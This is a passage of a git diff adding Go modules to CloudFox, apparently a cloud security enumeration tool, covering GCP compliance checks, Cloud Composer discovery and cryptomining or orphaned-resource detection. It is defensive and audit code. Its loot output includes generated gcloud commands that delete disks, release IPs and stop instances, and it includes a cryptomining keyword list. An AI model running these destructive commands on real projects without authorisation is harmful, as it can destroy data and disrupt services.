m.sccFindings["BIGQUERY_TABLE_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible BigQuery datasets", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "bigquery-dataset", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// ------------------------------ +// Framework Mapping +// ------------------------------ +func (m *ComplianceDashboardModule) mapToFrameworks() { + // Map CIS controls to other frameworks + for _, control := range m.Controls { + // Update CIS framework stats + if fw, ok := m.Frameworks["CIS-GCP-2.0"]; ok { + fw.TotalControls++ + switch control.Status { + case "PASS": + fw.PassedControls++ + case "FAIL": + fw.FailedControls++ + case "MANUAL": + fw.ManualControls++ + case "NOT_APPLICABLE": + fw.NAControls++ + } + } + } + + // Calculate scores for each framework + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + assessed := fw.PassedControls + fw.FailedControls + if assessed > 0 { + fw.Score = float64(fw.PassedControls) / float64(assessed) * 100 + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *ComplianceDashboardModule) addFailure(control ComplianceControl, resource, resourceType, projectID string) { + failure := ComplianceFailure{ + ControlID: control.ControlID, + Framework: control.Framework, + ControlName: control.ControlName, + Severity: control.Severity, + ResourceName: resource, + ResourceType: resourceType, + ProjectID: projectID, + Details: control.Details, + Remediation: control.Remediation, + RiskScore: m.calculateComplianceRiskScore(control.Severity), + } + + m.mu.Lock() + m.Failures = append(m.Failures, failure) + m.mu.Unlock() + + // Add to loot + m.addFailureToLoot(failure) +} + +func (m *ComplianceDashboardModule) calculateComplianceRiskScore(severity string) int { + switch severity { + case "CRITICAL": + return 100 + case "HIGH": + return 80 + case "MEDIUM": + return 50 + case "LOW": + return 25 + default: + return 10 + } +} + +func (m *ComplianceDashboardModule) getProjectFromResource(resource string) string { + // Extract project ID from resource name + // Format: projects/{project}/... + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ComplianceDashboardModule) initializeLootFiles() { + m.LootMap["compliance-critical-failures"] = &internal.LootFile{ + Name: "compliance-critical-failures", + Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# These require immediate remediation!\n\n", + } + m.LootMap["compliance-remediation-commands"] = &internal.LootFile{ + Name: "compliance-remediation-commands", + Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["compliance-by-framework"] = &internal.LootFile{ + Name: "compliance-by-framework", + Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n\n", + } + m.LootMap["compliance-failed-controls"] = &internal.LootFile{ + Name: "compliance-failed-controls", + Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n\n", + } +} + +func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) { + m.mu.Lock() + defer m.mu.Unlock() + + // Critical failures + if failure.Severity == "CRITICAL" { + m.LootMap["compliance-critical-failures"].Contents += fmt.Sprintf( + "## %s - %s\n"+ + "Framework: %s\n"+ + "Resource: %s\n"+ + "Project: %s\n"+ + "Risk Score: %d\n"+ + "Remediation: %s\n\n", + failure.ControlID, + failure.ControlName, + failure.Framework, + failure.ResourceName, + failure.ProjectID, + failure.RiskScore, + failure.Remediation, + ) + } + + // Remediation commands + m.LootMap["compliance-remediation-commands"].Contents += fmt.Sprintf( + "# %s: %s\n"+ + "# Resource: %s\n"+ + "# %s\n\n", + failure.ControlID, + failure.ControlName, + failure.ResourceName, + failure.Remediation, + ) + + // Failed controls + m.LootMap["compliance-failed-controls"].Contents += fmt.Sprintf( + "%s (%s) - %s\n", + failure.ControlID, + failure.Severity, + failure.ResourceName, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort controls by severity, then control ID + sort.Slice(m.Controls, func(i, j int) bool { + if m.Controls[i].Status == "FAIL" && m.Controls[j].Status != "FAIL" { + return true + } + if m.Controls[i].Status != "FAIL" && m.Controls[j].Status == "FAIL" { + return false + } + severityOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + if severityOrder[m.Controls[i].Severity] != severityOrder[m.Controls[j].Severity] { + return severityOrder[m.Controls[i].Severity] < severityOrder[m.Controls[j].Severity] + } + return m.Controls[i].ControlID < m.Controls[j].ControlID + }) + + // Controls table + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range m.Controls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + // Failures table + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range m.Failures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + // Framework summary table + frameworkHeader := []string{ + "Framework", + "Version", + "Total", + "Passed", + "Failed", + "Manual", + "Score (%)", + } + + var frameworkBody [][]string + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + frameworkBody = append(frameworkBody, []string{ + fw.Name, + fw.Version, + fmt.Sprintf("%d", fw.TotalControls), + fmt.Sprintf("%d", fw.PassedControls), + fmt.Sprintf("%d", fw.FailedControls), + fmt.Sprintf("%d", fw.ManualControls), + fmt.Sprintf("%.1f", fw.Score), + }) + } + } + + // Add framework summary to loot + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + m.LootMap["compliance-by-framework"].Contents += fmt.Sprintf( + "## %s v%s\n"+ + "Total Controls: %d\n"+ + "Passed: %d\n"+ + "Failed: %d\n"+ + "Manual Review: %d\n"+ + "Compliance Score: %.1f%%\n\n", + fw.Name, + fw.Version, + fw.TotalControls, + fw.PassedControls, + fw.FailedControls, + fw.ManualControls, + fw.Score, + ) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }, + } + + // Add failures table if any + if len(failuresBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + // Add framework summary table + if len(frameworkBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-summary", + Header: frameworkHeader, + Body: frameworkBody, + }) + } + + output := ComplianceDashboardOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go new file mode 100644 index 00000000..37305daf --- /dev/null +++ b/gcp/commands/composer.go @@ -0,0 +1,223 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPComposerCommand = &cobra.Command{ + Use: globals.GCP_COMPOSER_MODULE_NAME, + Aliases: []string{"airflow"}, + Short: "Enumerate Cloud Composer environments", + Long: `Enumerate Cloud Composer (managed Apache Airflow) environments. + +Features: +- Lists all Composer environments across locations +- Shows Airflow web UI endpoints +- Identifies service account configuration +- Analyzes network exposure (private vs public) +- Detects overly permissive IP restrictions`, + Run: runGCPComposerCommand, +} + +type ComposerModule struct { + gcpinternal.BaseGCPModule + Environments []composerservice.EnvironmentInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type ComposerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComposerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComposerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPComposerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_COMPOSER_MODULE_NAME) + if err != nil { + return + } + + module := &ComposerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Environments: []composerservice.EnvironmentInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) + + if len(m.Environments) == 0 { + logger.InfoM("No Composer environments found", globals.GCP_COMPOSER_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicEnvs := 0 + for _, env := range m.Environments { + if env.State == "RUNNING" { + running++ + } + if !env.PrivateEnvironment { + publicEnvs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Composer environment(s) (%d running, %d public)", + len(m.Environments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *ComposerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Composer in project: %s", projectID), globals.GCP_COMPOSER_MODULE_NAME) + } + + svc := composerservice.New() + environments, err := svc.ListEnvironments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_COMPOSER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Composer environments in project %s", projectID)) + return + } + + m.mu.Lock() + m.Environments = append(m.Environments, environments...) + for _, env := range environments { + m.addToLoot(env) + } + m.mu.Unlock() +} + +func (m *ComposerModule) initializeLootFiles() { + m.LootMap["composer-commands"] = &internal.LootFile{ + Name: "composer-commands", + Contents: "# Composer Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + env.Name, env.Location, + env.ProjectID, + ) + + // gcloud commands + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "gcloud composer environments describe %s --location=%s --project=%s\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags list\n", + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // DAG bucket command + if env.DagGcsPrefix != "" { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "gsutil ls %s\n", + env.DagGcsPrefix, + ) + } + + // Airflow Web UI + if env.AirflowURI != "" { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "# Airflow Web UI: %s\n", + env.AirflowURI, + ) + } + + m.LootMap["composer-commands"].Contents += "\n" +} + +func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Service Account", + "Private", + "Private Endpoint", + "Airflow URI", + "DAG Bucket", + "Image Version", + } + + var body [][]string + for _, env := range m.Environments { + sa := env.ServiceAccount + if sa == "" { + sa = "(default)" + } + + airflowURI := env.AirflowURI + if airflowURI == "" { + airflowURI = "-" + } + + dagBucket := env.DagGcsPrefix + if dagBucket == "" { + dagBucket = "-" + } + + imageVersion := env.ImageVersion + if imageVersion == "" { + imageVersion = "-" + } + + body = append(body, []string{ + m.GetProjectName(env.ProjectID), + env.ProjectID, + env.Name, + env.Location, + env.State, + sa, + boolToYesNo(env.PrivateEnvironment), + boolToYesNo(env.EnablePrivateEndpoint), + airflowURI, + dagBucket, + imageVersion, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "composer", Header: header, Body: body}} + + output := ComposerOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go new file mode 100644 index 00000000..cbc44526 --- /dev/null +++ b/gcp/commands/costsecurity.go @@ -0,0 +1,974 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" + "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" + +var GCPCostSecurityCommand = &cobra.Command{ + Use: GCP_COSTSECURITY_MODULE_NAME, + Aliases: []string{"cost", "cost-anomaly", "orphaned", "cryptomining"}, + Hidden: true, + Short: "Identify cost anomalies, orphaned resources, and potential cryptomining activity", + Long: `Analyze resources for cost-related security issues and waste. + +Features: +- Detects potential cryptomining indicators (high CPU instances, GPUs) +- Identifies orphaned resources (unattached disks, unused IPs) +- Finds expensive idle resources +- Analyzes resource utilization patterns +- Identifies resources without cost allocation labels +- Detects unusual resource creation patterns + +Requires appropriate IAM permissions: +- roles/compute.viewer +- roles/storage.admin +- roles/cloudsql.viewer`, + Run: runGCPCostSecurityCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type CostAnomaly struct { + Name string + ProjectID string + ResourceType string + AnomalyType string // cryptomining, orphaned, idle, unlabeled, unusual-creation + Severity string + Details string + EstCostMonth float64 + CreatedTime string + Location string + Remediation string +} + +type OrphanedResource struct { + Name string + ProjectID string + ResourceType string + Location string + SizeGB int64 + Status string + CreatedTime string + EstCostMonth float64 + Reason string +} + +type ExpensiveResource struct { + Name string + ProjectID string + ResourceType string + Location string + MachineType string + VCPUs int64 + MemoryGB float64 + GPUs int + Status string + CreatedTime string + Labels map[string]string + EstCostMonth float64 +} + +type CryptominingIndicator struct { + Name string + ProjectID string + ResourceType string + Location string + Indicator string + Confidence string // HIGH, MEDIUM, LOW + Details string + CreatedTime string + Remediation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CostSecurityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + CostAnomalies []CostAnomaly + Orphaned []OrphanedResource + Expensive []ExpensiveResource + Cryptomining []CryptominingIndicator + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalEstCost float64 + orphanedEstCost float64 + cryptoIndicators int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CostSecurityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CostSecurityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CostSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCostSecurityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COSTSECURITY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &CostSecurityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CostAnomalies: []CostAnomaly{}, + Orphaned: []OrphanedResource{}, + Expensive: []ExpensiveResource{}, + Cryptomining: []CryptominingIndicator{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CostSecurityModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing resources for cost anomalies and security issues...", GCP_COSTSECURITY_MODULE_NAME) + + // Create service clients + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + return + } + + storageService, err := storage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Storage service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, storageService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Check results + totalFindings := len(m.CostAnomalies) + len(m.Orphaned) + len(m.Cryptomining) + if totalFindings == 0 { + logger.InfoM("No cost anomalies or security issues found", GCP_COSTSECURITY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d cost anomaly(ies), %d orphaned resource(s), %d cryptomining indicator(s)", + len(m.CostAnomalies), len(m.Orphaned), len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + + if len(m.Cryptomining) > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d potential cryptomining indicator(s) detected!", len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + } + + if m.orphanedEstCost > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Estimated monthly cost of orphaned resources: $%.2f", m.orphanedEstCost), GCP_COSTSECURITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CostSecurityModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, storageService *storage.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing costs for project: %s", projectID), GCP_COSTSECURITY_MODULE_NAME) + } + + // Analyze compute instances + m.analyzeComputeInstances(ctx, projectID, computeService, logger) + + // Find orphaned disks + m.findOrphanedDisks(ctx, projectID, computeService, logger) + + // Find orphaned IPs + m.findOrphanedIPs(ctx, projectID, computeService, logger) + + // Analyze SQL instances + if sqlService != nil { + m.analyzeSQLInstances(ctx, projectID, sqlService, logger) + } + + // Analyze storage buckets + if storageService != nil { + m.analyzeStorageBuckets(ctx, projectID, storageService, logger) + } +} + +func (m *CostSecurityModule) analyzeComputeInstances(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, instanceList := range page.Items { + if instanceList.Instances == nil { + continue + } + for _, instance := range instanceList.Instances { + m.analyzeInstance(instance, projectID, m.extractZoneFromURL(zone), logger) + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate compute instances in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeInstance(instance *compute.Instance, projectID, zone string, logger internal.Logger) { + machineType := m.extractMachineTypeName(instance.MachineType) + vcpus, memGB := m.parseMachineType(machineType) + + // Count GPUs + gpuCount := 0 + for _, accel := range instance.GuestAccelerators { + gpuCount += int(accel.AcceleratorCount) + } + + // Check for cryptomining indicators + m.checkCryptominingIndicators(instance, projectID, zone, machineType, vcpus, memGB, gpuCount) + + // Check for expensive resources + estCost := m.estimateInstanceCost(machineType, vcpus, memGB, gpuCount) + if estCost > 500 { // Monthly threshold + expensive := ExpensiveResource{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + MachineType: machineType, + VCPUs: vcpus, + MemoryGB: memGB, + GPUs: gpuCount, + Status: instance.Status, + CreatedTime: instance.CreationTimestamp, + Labels: instance.Labels, + EstCostMonth: estCost, + } + + m.mu.Lock() + m.Expensive = append(m.Expensive, expensive) + m.totalEstCost += estCost + m.mu.Unlock() + } + + // Check for unlabeled resources + if len(instance.Labels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Instance has no cost allocation labels", + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: fmt.Sprintf("gcloud compute instances add-labels %s --labels=cost-center=UNKNOWN,owner=UNKNOWN --zone=%s --project=%s", instance.Name, zone, projectID), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for unusual creation times (off-hours) + m.checkUnusualCreation(instance, projectID, zone, estCost) +} + +func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Instance, projectID, zone, machineType string, vcpus int64, memGB float64, gpuCount int) { + indicators := []CryptominingIndicator{} + + // Indicator 1: GPU instance + if gpuCount > 0 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "GPU_INSTANCE", + Confidence: "MEDIUM", + Details: fmt.Sprintf("Instance has %d GPU(s) attached", gpuCount), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance is authorized for GPU workloads", + } + indicators = append(indicators, indicator) + } + + // Indicator 2: High CPU count + if vcpus >= 32 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("Instance has %d vCPUs (high compute capacity)", vcpus), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance's CPU usage is legitimate", + } + indicators = append(indicators, indicator) + } + + // Indicator 3: Preemptible/Spot with high specs (common for mining) + if instance.Scheduling != nil && instance.Scheduling.Preemptible && (vcpus >= 8 || gpuCount > 0) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "PREEMPTIBLE_HIGH_SPEC", + Confidence: "MEDIUM", + Details: "Preemptible instance with high specs (common mining pattern)", + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this preemptible instance is used for legitimate batch processing", + } + indicators = append(indicators, indicator) + } + + // Indicator 4: Suspicious naming patterns + nameLower := strings.ToLower(instance.Name) + suspiciousPatterns := []string{"miner", "mining", "xmr", "monero", "btc", "ethereum", "eth", "crypto", "hash"} + for _, pattern := range suspiciousPatterns { + if strings.Contains(nameLower, pattern) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "SUSPICIOUS_NAME", + Confidence: "HIGH", + Details: fmt.Sprintf("Instance name contains suspicious pattern: %s", pattern), + CreatedTime: instance.CreationTimestamp, + Remediation: "Investigate this instance immediately for cryptomining", + } + indicators = append(indicators, indicator) + break + } + } + + // Indicator 5: N2D/C2 machine types (AMD EPYC - preferred for mining) + if strings.HasPrefix(machineType, "n2d-") || strings.HasPrefix(machineType, "c2-") { + if vcpus >= 16 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "AMD_HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("AMD EPYC instance with high CPU (%s)", machineType), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify legitimate use of AMD EPYC high-CPU instance", + } + indicators = append(indicators, indicator) + } + } + + // Add indicators to tracking + m.mu.Lock() + for _, ind := range indicators { + m.Cryptomining = append(m.Cryptomining, ind) + m.cryptoIndicators++ + + // Add to loot + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## CRYPTOMINING INDICATOR: %s (Project: %s)\n"+ + "# Location: %s | Type: %s\n"+ + "# Investigate instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Stop instance if suspicious:\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n\n", + ind.Name, ind.ProjectID, + ind.Location, ind.Indicator, + ind.Name, ind.Location, ind.ProjectID, + ind.Name, ind.Location, ind.ProjectID, + ) + } + m.mu.Unlock() +} + +func (m *CostSecurityModule) checkUnusualCreation(instance *compute.Instance, projectID, zone string, estCost float64) { + createdTime, err := time.Parse(time.RFC3339, instance.CreationTimestamp) + if err != nil { + return + } + + // Check if created during unusual hours (midnight to 5am local, or weekends) + hour := createdTime.Hour() + weekday := createdTime.Weekday() + + if (hour >= 0 && hour <= 5) || weekday == time.Saturday || weekday == time.Sunday { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unusual-creation", + Severity: "MEDIUM", + Details: fmt.Sprintf("Instance created at unusual time: %s", createdTime.Format("Mon 2006-01-02 15:04")), + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: "Verify this instance creation was authorized", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } +} + +func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + // Check if disk is attached to any instance + if len(disk.Users) == 0 { + estCost := m.estimateDiskCost(disk.SizeGb, disk.Type) + + orphaned := OrphanedResource{ + Name: disk.Name, + ProjectID: projectID, + ResourceType: "compute-disk", + Location: m.extractZoneFromURL(zone), + SizeGB: disk.SizeGb, + Status: disk.Status, + CreatedTime: disk.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Disk not attached to any instance", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + // Add cleanup command to loot + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## ORPHANED DISK: %s (Project: %s)\n"+ + "# Size: %dGB | Est. Cost: $%.2f/month\n"+ + "# Delete orphaned disk:\n"+ + "gcloud compute disks delete %s --zone=%s --project=%s\n\n", + disk.Name, projectID, + disk.SizeGb, estCost, + disk.Name, m.extractZoneFromURL(zone), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Global addresses + req := computeService.Addresses.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for region, addressList := range page.Items { + if addressList.Addresses == nil { + continue + } + for _, addr := range addressList.Addresses { + // Check if address is in use + if addr.Status == "RESERVED" && len(addr.Users) == 0 { + // Static IP costs ~$7.2/month when not in use + estCost := 7.2 + + orphaned := OrphanedResource{ + Name: addr.Name, + ProjectID: projectID, + ResourceType: "static-ip", + Location: m.extractRegionFromURL(region), + Status: addr.Status, + CreatedTime: addr.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Static IP reserved but not attached", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## ORPHANED IP: %s (Project: %s)\n"+ + "# Address: %s | Est. Cost: $%.2f/month\n"+ + "# Release static IP:\n"+ + "gcloud compute addresses delete %s --region=%s --project=%s\n\n", + addr.Name, projectID, + addr.Address, estCost, + addr.Name, m.extractRegionFromURL(region), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate addresses in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + // Check for 